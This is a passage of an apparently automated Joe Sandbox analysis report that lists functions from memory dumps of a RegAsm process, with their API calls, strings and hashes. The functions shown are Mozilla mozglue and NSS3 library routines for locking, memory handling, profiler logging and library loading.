Part of subcall function 6C791EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C791DF2,00000000,00000000), ref: 6C791F0C
Part of subcall function 6C791EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C791F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C791DF4

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: db125273baec3bbc31ccaad74b3ac40b1e86ff878eb4b0c4874cccfff87e639e
Instruction ID: 4ac396b6832fdafd94cf638d96044627c20370af7191f34fd20d6d6943f54934
Opcode Fuzzy Hash: db125273baec3bbc31ccaad74b3ac40b1e86ff878eb4b0c4874cccfff87e639e
Instruction Fuzzy Hash: F14187B5200705AFCB10DF28C589A56BBF9FF89718F10442EE99A87B41CB31F964CB91

Function 6C7538A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C7CE220,?,?,?,?,6C753899,?), ref: 6C7538B2
ReleaseSRWLockExclusive.KERNEL32(6C7CE220,?,?,?,6C753899,?), ref: 6C7538C3
free.MOZGLUE(00000000,?,?,?,6C753899,?), ref: 6C7538F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C753920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C753899,?), ref: 6C75392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C753899,?), ref: 6C753943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C75396E

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 45179077cfca5ab2b8041733f259ab0b6c5630f28e2befc7d1837ee7d3d4f2f4
Instruction ID: 67222513d42aecca127b095268cad3558584443228dbe4caf92736f4537ed124
Opcode Fuzzy Hash: 45179077cfca5ab2b8041733f259ab0b6c5630f28e2befc7d1837ee7d3d4f2f4
Instruction Fuzzy Hash: C92105B2600614DFD710DF16C984B86BBA9FF45328F558439E96AA7B20CB34F845CBA0

Function 6C7884E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7884F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C78856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7885AC

Part of subcall function 6C787670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C78767F
Part of subcall function 6C787670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C787693
Part of subcall function 6C787670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7876A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7885B2

Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 8910cf6a03208ce858d80301ca7956efbbd6bf71c9b8f1688aa123ac76e02263
Instruction ID: da69aa2d83b1229d7ce280048e639d25b3c33a511ae918926e453cd548332f38
Opcode Fuzzy Hash: 8910cf6a03208ce858d80301ca7956efbbd6bf71c9b8f1688aa123ac76e02263
Instruction Fuzzy Hash: 3421DE742016019FDB14DB28C988A6AB7B5BF8430DF24483DE65BC7B81DB31F949CB51

Function 6C765B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7656EE,?,00000001), ref: 6C765B85
EnterCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765B90
LeaveCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765BD8
GetTickCount64.KERNEL32 ref: 6C765BE4

Strings

Vvl, xrefs: 6C765C35
Vvl, xrefs: 6C765B5C

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
String ID: Vvl$Vvl
API String ID: 2796706680-1345354768
Opcode ID: a7aa03d5bc6c46a1f73911bcabd90f3ac834bff2c09e9080dce3c0b2739250cb
Instruction ID: d99426c6a6e454832dfbd937100b27c32290119c87e9d7f2ccefdb125da197af
Opcode Fuzzy Hash: a7aa03d5bc6c46a1f73911bcabd90f3ac834bff2c09e9080dce3c0b2739250cb
Instruction Fuzzy Hash: 3021B1757047069FCB08CF28C55565ABBF9EB8A714F04C83EE8DA87791DB30AA04CB81

Function 6C751640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C751699
VerSetConditionMask.NTDLL ref: 6C7516CB
VerSetConditionMask.NTDLL ref: 6C7516D7
VerSetConditionMask.NTDLL ref: 6C7516DE
VerSetConditionMask.NTDLL ref: 6C7516E5
VerSetConditionMask.NTDLL ref: 6C7516EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7516F9

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: f418c1a205ce0dfaa00b3e40c13462ae06caa0106555c72240ce59c621453fe4
Instruction ID: a7882202371d275632d0a00b859e42eb88a16917e23ff80af8c7d3cbddaec06e
Opcode Fuzzy Hash: f418c1a205ce0dfaa00b3e40c13462ae06caa0106555c72240ce59c621453fe4
Instruction Fuzzy Hash: B021D5B07402096FEB105F648D8AFFB737CDF96704F404528F6059B5C0CA749E6487A1

Function 6C78DE60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78DE73
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C7BFEF3,?,?,?,?,?,?,00000000), ref: 6C78DE7B

Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508

Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000), ref: 6C78DEB8
free.MOZGLUE(00000000), ref: 6C78DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C78DF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6C78DE83

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentProcessThread$BufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] locked_profiler_stop
API String ID: 3136165603-3405337583
Opcode ID: 1425c7cbb310c775966e2501e676f3e02e524c484c16cf16d748856424fe7db2
Instruction ID: 6ab063e6873bba0e0f72a48f73d57bf5eb47c01ac7321d00b4f772904d0e072b
Opcode Fuzzy Hash: 1425c7cbb310c775966e2501e676f3e02e524c484c16cf16d748856424fe7db2
Instruction Fuzzy Hash: 4F213A357021024FEB148B75DA0C79A7779EB9231CF540137EA2987F41CB74AA09CBE5

Function 6C878C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C878C1B
EnterCriticalSection.KERNEL32 ref: 6C878C34
PL_ArenaAllocate.NSS3 ref: 6C878C65
PR_Unlock.NSS3 ref: 6C878C9C
PR_Unlock.NSS3 ref: 6C878CB6

Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4

Strings

KRAM, xrefs: 6C878C8F

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 82637fe1b0bd5bacb3139bb8bfb14bb7f728421e5f649a4f8db6129303b4a9f5
Instruction ID: fffe4bacbc5ac495e1f2e018a0482c2b005e52533a152b43b572a6724e8516f7
Opcode Fuzzy Hash: 82637fe1b0bd5bacb3139bb8bfb14bb7f728421e5f649a4f8db6129303b4a9f5
Instruction Fuzzy Hash: 38217EB16056018FD760AF38C58456DBBF4FF45318F16896AD8889B701EB35D885CBA2

Function 6C79D1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C79D1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D1F5

Part of subcall function 6C79AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C79AE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D211
GetCurrentThreadId.KERNEL32 ref: 6C79D217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C79D226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C79D279
free.MOZGLUE(?), ref: 6C79D2B2

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: 9a5eb7a3bc2ab8112a5892fae3e509158baa42655a838bf3d5887a3cba4fbac7
Instruction ID: 2eb75fda7aeecd17cfbafedc70fc22118cdb7703f4adddda87525362382f9b4f
Opcode Fuzzy Hash: 9a5eb7a3bc2ab8112a5892fae3e509158baa42655a838bf3d5887a3cba4fbac7
Instruction Fuzzy Hash: BD215C71604306DFCB04DF64D888A9EB7B5FF8A324F10462EE51A8B740DB30A949CB96

Function 6C78F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C78F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C78F598), ref: 6C78F621

Part of subcall function 6C7894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7894EE
Part of subcall function 6C7894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C789508

GetCurrentThreadId.KERNEL32 ref: 6C78F637
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8,?,?,00000000,?,6C78F598), ref: 6C78F645
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8,?,?,00000000,?,6C78F598), ref: 6C78F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C78F62A

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 9b1399a9a0d87940162fcff95040f2880b493d67017bcc1d9f58c5e4137b203a
Instruction ID: 082bd13aeb67bc4392449214ceda623a58c43f4e12b25c6965bb7bc4322bdc3e
Opcode Fuzzy Hash: 9b1399a9a0d87940162fcff95040f2880b493d67017bcc1d9f58c5e4137b203a
Instruction Fuzzy Hash: 2011C131302206AFCB40AF68CA4C9E5777DFB86769F100036FA1683F41CB35AA11CBA0

Function 6C752070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1

LoadLibraryW.KERNEL32(combase.dll,6C751C5F), ref: 6C7520AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C7520CD
__Init_thread_footer.LIBCMT ref: 6C7520E1
FreeLibrary.KERNEL32 ref: 6C752124

Strings

combase.dll, xrefs: 6C7520A9
CoInitializeSecurity, xrefs: 6C7520C7

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: d567019573e513f3c153a5a1180e56241a4d20825caaba4eda5f411015e55d5f
Instruction ID: 7c4108b83d52ee3933041fc59ae8eed62a05c6c5fc0ba4c096364d9fd229eb46
Opcode Fuzzy Hash: d567019573e513f3c153a5a1180e56241a4d20825caaba4eda5f411015e55d5f
Instruction Fuzzy Hash: E3217C7620120AEFDF119F54EE48D9A3F7AFB0A365F104038FA0492610D731EA61DFA1

Function 6C7A76C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C7A76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C7A7705

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C7A7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C7A778F,00000000,00000000,00000000,00000000), ref: 6C7A7731
free.MOZGLUE(00000000), ref: 6C7A7760

Strings

}>xl, xrefs: 6C7A76C4

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>xl
API String ID: 2538299546-889631050
Opcode ID: 1eb67378209601b1021f5125e041cf60399adcc61e83a52caee23a12ddb9b378
Instruction ID: 7146b3a6301c52ce664e36e0b115eee9364ad2d259da38930571a19a1743a50f
Opcode Fuzzy Hash: 1eb67378209601b1021f5125e041cf60399adcc61e83a52caee23a12ddb9b378
Instruction Fuzzy Hash: D011C4B29002156FE710AFB69D48BABBEE8EF45354F044539F848E7300E7709940CBE2

Function 6C7899A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
Part of subcall function 6C789420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
Part of subcall function 6C789420: __Init_thread_footer.LIBCMT ref: 6C78949F

GetCurrentThreadId.KERNEL32 ref: 6C7899C1
AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C7899CE
ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C7899F8
GetCurrentThreadId.KERNEL32 ref: 6C789A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C789A0D

Part of subcall function 6C789A60: GetCurrentThreadId.KERNEL32 ref: 6C789A95
Part of subcall function 6C789A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C789A9D
Part of subcall function 6C789A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C789ACC
Part of subcall function 6C789A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C789BA7
Part of subcall function 6C789A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C789BB8
Part of subcall function 6C789A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C789BC9

Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C789A15

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 50e12a8693d4d0379ff7e3142d477ed76ffc1811dc2db10878cd317470b6540a
Instruction ID: 4fea0777b076a9f2236d5b7a2a5fb68df638c93a746ed0a159815714ce550b1f
Opcode Fuzzy Hash: 50e12a8693d4d0379ff7e3142d477ed76ffc1811dc2db10878cd317470b6540a
Instruction Fuzzy Hash: 4301C036A051269FDB006FA5DA0C6AA3B78EB92759F044037FE1A53B41C7385B04CAA2

Function 6C972C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C972CA0
PR_ExitMonitor.NSS3 ref: 6C972CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C972CD1
strdup.MOZGLUE(?), ref: 6C972CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C972D27

Strings

Loaded library %s (static lib), xrefs: 6C972D22

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 39ae2a1616c4223dbff9fb8a0beb143ba064d8b86780fdf69e7827f3eec79750
Instruction ID: d90f91172d74dc44e099f8b7c378c941af944c06d49ae966e61eda1007f23c1a
